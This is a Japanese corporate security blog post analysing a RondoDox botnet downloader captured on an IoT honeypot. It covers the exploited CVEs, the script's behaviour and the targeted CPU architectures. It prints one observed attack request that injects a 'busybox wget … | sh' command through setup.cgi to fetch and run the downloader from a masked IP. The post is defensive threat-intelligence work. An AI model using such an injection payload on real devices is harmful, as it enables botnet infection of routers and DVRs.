はじめに
三菱電機の大塚です。
三菱電機 情報技術総合研究所では、製品開発時のセキュリティ対策にフィードバックする目的で、複数種類のハニーポットを設置・運用しています。
今回は、IoT家電ハニーポットで観測した、「RondoDox」ダウンローダファイルについてご紹介します。
新型ボットネット「RondoDox」の概要
2025年7月3日、大手セキュリティベンダーであるFortinetは新型ボットネット「RondoDox」の分析結果を公表1しました。
このBotnetキャンペーンは、CVE-2024-3721とCVE-2024-12856を悪用した内容であり、どちらの脆弱性も高リスクの脆弱性であるため、攻撃が成功した際の被害は大きいと予想されます。
- CVE-2024-3721:TBK社製DVR機器の脆弱性。対象モデルはDVR-4104、DVR-4216(2024/4/12時点)。
- CVE-2024-12856:Four-Faith社製ルータの脆弱性。対象モデルはF3x24、F3x36。
RondoDoxの特徴として、XORを用いた難読化アルゴリズムを使用し、自身の設定ファイルをエンコードしている点が挙げられます。このため一見すると、どのようなコードが書かれているのかが分かりません。
Fortinetは記事の中で、RondoDoxのダウンローダについて以下の見解を示しています。
RondoDoxは当初、ARMおよびMIPSアーキテクチャ上で動作するLinuxベースのオペレーティングシステムを標的にして配信されていました。しかし、最近の調査では新たなシェルスクリプトダウンローダーが確認されており、このマルウェアはIntel 80386、MC68000、MIPS R3000、PowerPC、SuperH、ARCompact、x86-64、AArch64など広範囲にわたるLinuxアーキテクチャを攻撃できるようになったと考えられます。
今回の観測で得たダウンローダファイル「rondo.ush.sh」は、上記のアーキテクチャに加えてさらに対応するアーキテクチャの種類が増えており、攻撃範囲が広がったとみられます。
- RondoDox Unveiled: Breaking Down a New Botnet Threat, RondoDox Unveiled: Breaking Down a New Botnet Threat | FortiGuard Labs
ダウンローダファイル「rondo.ush.sh」について
2025年7月30日~2025年9月12日の観測期間において、弊社のハニーポットでは、以下のリクエストを24件観測しました。
| URI |
|---|
| GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2XX[.]XX.XX.XX%2Frondo.ush.sh%7Ch%26&curpath=%2F¤tsetting.htm=1 HTTP/1.1\r\n |
上記リクエストでは、ペイロード内に挿入されたIPアドレス(XX[.]XX.XX.XX)からシェルスクリプト「rondo.ush.sh」を入手します。
本パケットの観測推移を送信ホストごとに色分けしたものが図1のグラフです。送信ホストは4種類あり、IPアドレスの所属はアメリカが3件、オランダが1件でした。どのホストも送信したパケットの数は多くなく、送信期間もばらけています。
「rondo.ush.sh」の内容を一部抜粋したものが図2,図3です。赤色でマスクをしている部分は、具体的なメールアドレス、IPアドレスが記載されていました。
本シェルスクリプトが実行されると、実行された対象(PC)を探索し、アーキテクチャ名に関するファイルを削除します。その後、シェルスクリプト内で指定されたIPアドレスから「rondo.アーキテクチャ名」というファイルを入手し、「rondo」という名称に変更してから実行、最後には痕跡を全て消去します。実際に、入手した「rondo.ush.sh」で指定されたIPアドレスからファイル取得を試みましたが、既にサーバが閉じてしまっているのか、ファイルを取得することはできませんでした。
しかし、これら一連の処理はFortinetが公表したダウンローダと一致しているため、「rondo.ush.sh」もRondoDox感染を試みるダウンローダであると考えられます。
「rondo.ush.sh」が一連の処理のなかで入手するファイルの拡張子から、以下のアーキテクチャが攻撃の標的になっていることが判明しました。これらの標的は、Fortieが公表したダウンローダよりも対象アーキテクチャにSPARCが追加されています。また、 Linuxシステムのセキュリティ機能の1つであるAppArmor (Application Armor) の停止(STOP)が追加されるなど、ダウンローダ自体もより複雑になっています。初期のダウンローダから進化したダウンローダである可能性が高いといえます。
| アーキテクチャファミリ名 | アーキテクチャ名 |
|---|---|
| ARM | armv4l, armv5l, armv6l, armv7l |
| MIPS | mips, mipsel |
| Intel 80386 | i686, i586, i486 |
| MC68000 | m68k |
| PowerPC | powerpc, powerpc-440fp |
| SuperH | sh4 |
| ARCompact | arc700 |
| x86-64 | x86_64 |
| SPARC | sparc |
おわりに
今回は、ハニーポット観測にて取得した、新型ボットネット「RondoDox」のダウンローダファイルについて分析を行いました。Fortinetが7/3に公表し、7/30にはこのような進化したダウンローダが確認されています。アーキテクチャが増加すると、感染対象となる端末も増加することから、今後、RondoDoxの感染拡大の可能性が考えられます。
ダウンローダやボットネットの進化は速いため、今後も引き続き観測を行い、新規の攻撃について分析を行うことが重要です。